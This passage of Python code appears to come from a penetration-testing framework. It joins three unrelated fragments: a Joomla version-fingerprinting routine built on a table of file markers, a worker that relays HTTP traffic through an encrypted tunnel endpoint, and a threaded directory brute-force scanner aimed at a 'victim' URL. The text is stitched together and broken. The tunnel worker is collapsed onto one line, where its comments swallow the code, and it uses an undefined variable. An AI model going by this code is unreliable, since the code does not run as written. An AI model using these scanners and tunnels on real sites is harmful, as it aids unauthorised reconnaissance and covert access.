                ['10208 2008-04-17 16:43:15Z', '1.5.3.Stable'],
                ['10498 2008-07-04 00:05:36Z', '1.5.4.Stable-1.5.7.Stable'],
                ['11214 2008-10-26 01:29:04Z', '1.5.8.Stable-1.5.8.Stable'],
                ['11391 2009-01-04 13:35:50Z', '1.5.9.Stable-1.5.11.Stable'],
                ['Copyright (C) 2005 - 2010 Open Source Matters', '1.5.16.Stable-1.5.20.Stable'],
                ['Problem with Joomla site', '1.5.17.Stable-1.5.17.Stable'],
                ['17165 2010-05-17 15:59:19Z', '1.6.0.Beta1-1.6.0.Beta1'],
                ['17420 2010-05-31 11:14:10Z', '1.6.0.Beta2-1.6.0.Beta2'],
                ['17675 2010-06-14 10:20:52Z', '1.6.0.Beta3-1.6.0.Beta3'],
                ['17903 2010-06-28 01:52:11Z', '1.6.0.Beta4-1.6.0.Beta4'],
                ['18082 2010-07-12 01:02:52Z', '1.6.0.Beta5-1.6.0.Beta5'],
                ['18198 2010-07-21 00:58:13Z', '1.6.0.Beta6-1.6.0.Beta8'],
                ['20196 2011-01-09 02:40:25Z', '1.6.0.Stable-1.6.1.Stable'],
                ['20990 2011-03-18 16:42:30Z', '1.6.2.Stable-1.7.5.Stable'],
            ],
        ],
        [
            'components/com_contact/metadata.xml',
            [
                ['8178 2007-07-23 05:39:47Z', '1.5.0.RC2-1.5.18.Stable'],
                ['17437 2010-06-01 14:35:04Z', '1.5.19.Stable-1.5.20.Stable'],
                ['16235 2010-04-20 04:13:25Z', '1.6.0.Stable-1.7.5.Stable'],
            ],
        ],
        [
            'htaccess.txt',
            [
                ['47 2005-09-15 02:55:27Z', '1.0.0-1.0.2'],
                ['423 2005-10-09 18:23:50Z', '1.0.3-1.0.3'],
                ['1005 2005-11-13 17:33:59Z', '1.0.4-1.0.5'],
                ['1570 2005-12-29 05:53:33Z', '1.0.6-1.0.7'],
                ['2368 2006-02-14 17:40:02Z', '1.0.8-1.0.9'],
                ['4085 2006-06-21 16:03:54Z', '1.0.10-1.0.10'],
                ['4756 2006-08-25 16:07:11Z', '1.0.11-1.0.11'],
                ['5973 2006-12-11 01:26:33Z', '1.0.12-1.0.12'],
                ['5975 2006-12-11 01:26:33Z', '1.0.13-1.0.14.RC1'],
                ['9317 2007-11-07 03:02:08Z', '1.5.0.RC4-1.5.0.Stable'],
                ['10492 2008-07-02 06:38:28Z', '1.5.0.Beta-1.5.14.Stable'],
                ['13415 2009-11-03 15:53:25Z', '1.5.15.Stable-1.5.15.Stable'],
                ['14401 2010-01-26 14:10:00Z', '1.5.16.Stable-1.5.20.Stable'],
                ['14276 2010-01-18 14:20:28Z', '1.6.0.Beta1-1.6.0.Beta8'],
                ['20196 2011-01-09 02:40:25Z', '1.6.0.Stable-1.6.1.Stable'],
                ['21101 2011-04-07 15:47:33Z', '1.6.2.Stable-1.7.5.Stable'],
            ],
        ],
        [
            'administrator/language/en-GB/en-GB.ini',
            [
                ['version 1.5.x 2005-10-30 14:10:00', '1.5.0.Beta-1.5.0.Beta'],
                ['9869 2008-01-05 04:00:13Z', '1.5.0.Stable-1.5.0.Stable'],
                ['9990 2008-02-05 21:54:06Z', '1.5.1.Stable-1.5.1.Stable'],
                ['10122 2008-03-10 11:58:27Z', '1.5.2.Stable-1.5.2.Stable'],
                ['10186 2008-04-02 13:10:12Z', '1.5.3.Stable-1.5.3.Stable'],
                ['10500 2008-07-04 06:57:07Z', '1.5.4.Stable-1.5.4.Stable'],
                ['10571 2008-07-21 01:27:35Z', '1.5.5.Stable-1.5.7.Stable'],
                ['11213 2008-10-25 12:43:11Z', '1.5.8.Stable-1.5.8.Stable'],
                ['11391 2009-01-04 13:35:50Z', '1.5.9.Stable-1.5.9.Stable'],
                ['11667 2009-03-08 20:32:38Z', '1.5.10.Stable-1.5.10.Stable'],
                ['11799 2009-05-06 02:15:50Z', '1.5.11.Stable-1.5.11.Stable'],
                ['12308 2009-06-23 04:05:28Z', '1.5.12.Stable-1.5.14.Stable'],
                ['13243 2009-10-20 04:01:04Z', '1.5.15.Stable-1.5.15.Stable'],
                ['16380 2010-04-23 09:19:48Z', '1.5.16.Stable-1.5.20.Stable'],
                ['17165 2010-05-17 15:59:19Z', '1.6.0.Beta1-1.6.0.Beta1'],
                ['17387 2010-05-30 16:28:20Z', '1.6.0.Beta2-1.6.0.Beta2'],
                ['17675 2010-06-14 10:20:52Z', '1.6.0.Beta3-1.6.0.Beta3'],
                ['17898 2010-06-27 13:03:01Z', '1.6.0.Beta4-1.6.0.Beta4'],
                ['18090 2010-07-12 10:49:58Z', '1.6.0.Beta5-1.6.0.Beta5'],
                ['18198 2010-07-21 00:58:13Z', '1.6.0.Beta6-1.6.0.Beta6'],
                ['18378 2010-08-09 17:29:44Z', '1.6.0.Beta7-1.6.0.Beta7'],
                ['18572 2010-08-22 09:57:58Z', '1.6.0.Beta8-1.6.0.Beta8'],
                ['20196 2011-01-09 02:40:25Z', '1.6.0.Stable-1.6.0.Stable'],
                ['20899 2011-03-07 20:56:09Z', '1.6.1.Stable-1.6.1.Stable'],
                ['20990 2011-03-18 16:42:30Z', '1.6.2.Stable-1.6.6.Stable'],
                ['21721 2011-07-01 08:48:47Z', '1.7.0.Stable-1.7.2.Stable'],
                ['22370 2011-11-09 16:18:06Z', '1.7.3.Stable-1.7.5.Stable'],
            ],
        ],
        [
            'language/en-GB/en-GB.com_media.ini',
            [
                ['10496 2008-07-03 07:08:39Z', '1.5.0.Beta-1.5.12.Stable'],
                ['12540 2009-07-22 17:34:44Z', '1.5.13.Stable-1.5.14.Stable'],
                ['13311 2009-10-24 04:13:49Z', '1.5.15.Stable-1.5.15.Stable'],
                ['14401 2010-01-26 14:10:00Z', '1.5.16.Stable-1.5.20.Stable'],
                ['17044 2010-05-14 09:52:50Z', '1.6.0.Beta1-1.6.0.Beta3'],
                ['17769 2010-06-20 01:50:48Z', '1.6.0.Beta4-1.6.0.Beta8'],
                ['20196 2011-01-09 02:40:25Z', '1.6.0.Stable-1.6.6.Stable'],
                ['21660 2011-06-23 13:25:32Z', '1.7.0.Stable-1.7.0.Stable'],
                ['21948 2011-08-08 16:02:50Z', '1.7.1.Stable-1.7.5.Stable'],
            ],
        ],
        [
            'configuration.php-dist',
            [
                ['47 2005-09-15 02:55:27Z', '1.0.0-1.0.0'],
                ['217 2005-09-21 15:15:58Z', '1.0.1-1.0.2'],
                ['506 2005-10-13 05:49:24Z', '1.0.3-1.0.7'],
                ['2622 2006-02-26 04:16:09Z', '1.0.8-1.0.8'],
                ['3754 2006-05-31 12:08:37Z', '1.0.9-1.0.10'],
                ['4802 2006-08-28 16:18:33Z', '1.0.11-1.0.12'],
                ['7424 2007-05-17 15:56:10Z', '1.0.13-1.0.15'],
                ['9991 2008-02-05 22:13:22Z', '1.5.0.Stable-1.5.8.Stable'],
                ['11409 2009-01-10 02:27:08Z', '1.5.9.Stable-1.5.9.Stable'],
                ['11687 2009-03-11 17:49:23Z', '1.5.10.Stable-1.5.15.Stable'],
                ['14401 2010-01-26 14:10:00Z', '1.5.16.Stable-1.5.20.Stable'],
            ],
        ],
    ]
    requester = HTTP(url)
    for link in storeversion:
        frmwk.print_status('Checking: ' + url + link[0])
        data = requester.Request(url + link[0])
        if requester.response.status == 200:
            # First marker present in the file wins.
            for vstr in link[1]:
                if data.find(vstr[0]) != -1:
                    self.version = vstr[1]
                    break
        if self.version:
            break
    # Fallbacks: the language and com_mailto manifests carry <version>.
    if not self.version:
        frmwk.print_status('Checking: ' + url + 'language/en-GB/en-GB.xml')
        data = requester.Request(url + 'language/en-GB/en-GB.xml')
        if requester.response.status == 200:
            version = search('<version>(.*?)</version>', data)
            if version:
                self.version = version.group(1)
    if not self.version:
        frmwk.print_status('Checking: ' + url + 'components/com_mailto/mailto.xml')
        data = requester.Request(url + 'components/com_mailto/mailto.xml')
        if requester.response.status == 200:
            version = search('<version>(.*?)</version>', data)
            if version:
                self.version = version.group(1)
    if self.version:
        frmwk.print_success('Fount version: ' + self.version)
    else:
        frmwk.print_error('Unknown version !')
def worker(self, c_conn, c_addr): self.frmwk.print_status("Accept new connect from " + str(c_addr)) ################### CONNET TUNNEL ##################### ### choin and connect to tunnel c_tunnel = self.choin_tunnel() # chon 1 tunnel t_conn = HTTP(c_tunnel[0], timeout=self.connect_timout) ### check tunnel is open if not t_conn: self.frmwk.print_error('Can\'t connect to tunnel') return None ### encrypt/decrypt init # tunnel_ks = self.vc_generatekeyhash(c_tunnel[2]) # tunnel_pe = self.vc_init(c_tunnel[2],tunnel_ks) # tunnel_pd = dict((tunnel_pe[i],i) for i in range(0,len(tunnel_pe))) if self.encrypt: crypt = crypton(c_tunnel[2]) else: crypt = None ################### START READ DATA CLIENT ##################### ### get status and header from sockert c_status, c_headers, c_content_len = self.socket_receiver(c_conn) ### set url, host, port, method s_https = 0 host = c_status[1] if host.startswith(b'http'): parser = parse.urlparse(host) s_host = parser.hostname s_port = parser.port s_path = b'/' + host.split(b'/', 3)[3] if not s_port: if parser.scheme == 'https': s_port = 443 else: s_port = 80 if parser.scheme == 'https': s_https = 1 else: self.frmwk.print_error("Unknown client request connect !") return None ### set status c_send_header = [b' '.join([c_status[0], s_path, c_status[2]])] ### set header for send c_headers.update({b'Connection': b'close'}) # fix host delay for k, v in c_headers.items(): if k.startswith(b'Proxy'): continue c_send_header.append(k + b': ' + v) ## add headers to send all data c_send_header = b"\r\n".join(c_send_header) + b"\r\n\r\n" ### set init param of tunnel c_send_init = self.send_init(s_host, s_port, self.r_buffer, self.s_buffer, s_https, c_tunnel, crypt) ### init and send tunnel parameter t_conn.init( c_tunnel[0], 'POST', { 'Content-Length': len(c_send_init) + len(c_send_header) + c_content_len }) t_conn.send(c_send_init) del c_send_init # clear memory ### get content from client and send to server with r_buffer if c_content_len > 0: 
c_sent = 0 ####### send header with content for full r_buffer encrypt if self.encrypt: mod_len = len(c_send_header) % len(c_tunnel[2]) data = c_conn.recv(mod_len) data = c_send_header + data data_len = len(data) for i in range(0, data_len, self.r_buffer): t_conn.send( crypt.vc_encrypt( data[i:min(i + self.r_buffer, data_len - i)])) c_sent = mod_len else: t_conn.send(c_send_header) ###### send content if c_sent < c_content_len: while True: data = c_conn.recv( min(self.r_buffer, c_content_len - c_sent)) if self.encrypt: t_conn.send(crypt.vc_encrypt(data)) else: t_conn.send(data) c_sent += len(data) if not data or c_sent == content_lent: break else: if self.encrypt: t_conn.send(crypt.vc_encrypt(c_send_header)) else: t_conn.send(c_send_header) del c_send_header # clear memory ############## END SEND ################ ############# START RECV ############### try: for res_chunk in t_conn.recv(self.s_buffer): if self.encrypt: c_conn.send(crypt.vc_decrypt(res_chunk)) else: c_conn.send(res_chunk) except Exception as e: self.frmwk.print_error(str(e)) finally: t_conn.request.close() c_conn.close() self.frmwk.print_status("Closed connect from " + str(c_addr))
def run(self, frmwk, args):
    """Set up and run the directory/file enumeration scanner.

    Word lists come from ``DIRLIST``/``FILELIST``; ``TYPE`` selects how a
    "not found" answer is recognised: ``'lenght'`` compares response
    lengths against a probe for a random path, ``'location'`` relies on
    redirects (``redirect`` disabled), ``'auto'`` picks one of those from
    the probe's status code.  Work is done by ``self.worker`` threads
    (defined elsewhere) that presumably consume ``self.tmp_dirs`` and
    append hits to ``self.success`` under ``self.locker``.

    Args:
        frmwk: framework object used for output.
        args: unused.
    """
    self.frmwk = frmwk
    self.dirs = ReadFromFile(FullPath(
        self.options['DIRLIST'])) if self.options['DIRLIST'] else []
    self.files = ReadFromFile(FullPath(
        self.options['FILELIST'])) if self.options['FILELIST'] else []
    self.url = self.options['URL'] if self.options['URL'].endswith(
        '/') else self.options['URL'] + '/'
    self.type = self.options['TYPE']
    self.thread = self.options['THREADS']
    self.stop = self.options['STOP']
    self.extension = self.options['EXTENSION'].split(',')
    self.timeout = self.advanced_options['TIMEOUT']
    self.into = self.advanced_options['INTO']
    self.victim = HTTP(self.url, timeout=self.timeout)
    self.victim.headers.update({'Cookie': self.advanced_options['COOKIE']} if self.advanced_options['COOKIE'] else {})
    self.success = []
    self.tmp_dirs = self.dirs + []  # shallow copy the workers can consume
    self.current_dir = ''
    self.locker = Lock()
    if self.type in ['lenght', 'auto']:
        # Separate client with redirects off, used only for the baseline probes.
        victim = deepcopy(self.victim)
        victim.redirect = False
        self.frmwk.print_status('Init not found infomation')
        victim.Request(self.url + 'ASDASdadhkjlhjfasdfawefa/', 'GET')
        if self.type == 'auto':
            # A 200 for a random path means length comparison is needed;
            # anything else is treated as redirect-based detection.
            if victim.response.status == 200:
                self.type = 'lenght'
                self.frmwk.print_success('auto get type: lenght')
            else:
                self.type = 'location'
                self.frmwk.print_success('auto get type: location')
        if self.type == 'lenght':
            self.notfounddir = len(victim.result)
        if self.type in ['lenght', 'location']:
            self.notfoundfile = len(
                victim.Request(
                    self.url + 'adfasdaszxcvzdczxfasASasda.'
                    + self.extension[0], 'GET'))
            self.offset = self.advanced_options['OFFSET']
        del victim
    if self.type == 'location':
        self.victim.redirect = False
    self.frmwk.print_status('Starting scanner')
    try:
        # Check files in the current path before starting the workers.
        if self.url.endswith('/'):
            self.url = self.url[:-1]
        self.filechecker(self.url)
        if not self.url.endswith('/'):
            self.url = self.url + '/'
        threads = []
        for i in range(self.thread):
            t = Thread(target=self.worker)
            threads.append(t)
            t.start()
        for t in threads:
            t.join()
    except KeyboardInterrupt:
        # NOTE(review): ``threads`` is unbound if Ctrl-C arrives during
        # filechecker(); threading.Thread has no terminate() (AttributeError)
        # and isAlive() was removed in Python 3.9 (use is_alive()).
        for t in threads:
            if t.isAlive():
                t.terminate()
        pass
    if len(self.success) > 0:
        self.frmwk.print_success('Found list:\n-----------')
        for link in self.success:
            self.frmwk.print_success(link)
    else:
        self.frmwk.print_error('---------\nNot Found!\n---------')